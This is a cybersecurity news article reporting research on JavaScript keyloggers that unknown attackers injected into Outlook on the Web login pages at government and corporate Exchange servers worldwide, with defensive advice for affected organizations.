Researchers unearth keyloggers on Outlook login pages

by CybrGPT
0 comment

Unknown threat actors have compromised internet-accessible Microsoft Exchange Servers of government organizations and companies around the world, and have injected the organizations’ Outlook on the Web (OWA) login page with browser-based keyloggers, Positive Technologies researchers have warned.

The keylogging JavaScript code (Source: Positive Technologies)

The initial vector for compromise is unknown

The researchers haven’t been able to pinpoint how the attackers gained access to the compromised servers.

Some of them were vulnerable to a slew of older vulnerabilities – including ProxyLogon (CVE-2021-26855), the three ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), and SMBGhost (CVE-2020-0796) – but others weren’t affected by publicly known vulnerabilities, so the attackers may have used other methods to compromise them.

What the researchers were able to establish is that the login pages have been compromised with either:

  • A JavaScript keylogger that grabs the login credentials (and occasionally user cookies) from the authentication form and essentially writes the data to a file on the compromised server which is accessible from the internet, or
  • A JavaScript keylogger that exfiltrates the data to a Telegram bot or Discord server, and marks it so that the attackers will known to which organization the stolen credentials belong to.

Damage control

Servers affected by these attackers have been found in Vietnam, Russia, Taiwan, China, Australian, and other countries in Asia, Europe, Africa, and the Middle East.

“The majority of compromised servers were found in government organizations (22 servers belonging to government entities), as well as in the IT, industrial, and logistics companies,” the researchers noted.

Outlook login page keyloggers

Number of victims in different countries (Source: Positive Technologies)

The malicious JavaScript code is imperceptible to those who use the OWA login page to access their email, calendar, etc. via a browser.

But organizations can and should check all login pages and files related to user authentication for potentially malicious code, and check the MS Exchange Server folder for web shells and suspicious pages. (To that end, the researchers have shared a helpful YARA rule.)

Needless to say, if they discover that they have been compromised, organizations should mount an in-depth investigation to pinpoint whether attackers have found their way into other systems and networks, and reset the login credentials of all users who access their account via the compromised page.

Subscribe to our breaking news e-mail alert to never miss out on the latest breaches, vulnerabilities and cybersecurity threats. Subscribe here!

Source link

You may also like

Leave a Comment

Stay informed with the latest in cybersecurity news. Explore updates on malware, ransomware, data breaches, and online threats. Your trusted source for digital safety and cyber defense insights.

BuyBitcoinFiveMinute

Subscribe my Newsletter for new blog posts, tips & new photos. Let’s stay updated!

© 2025 cybrgpt.com – All rights reserved.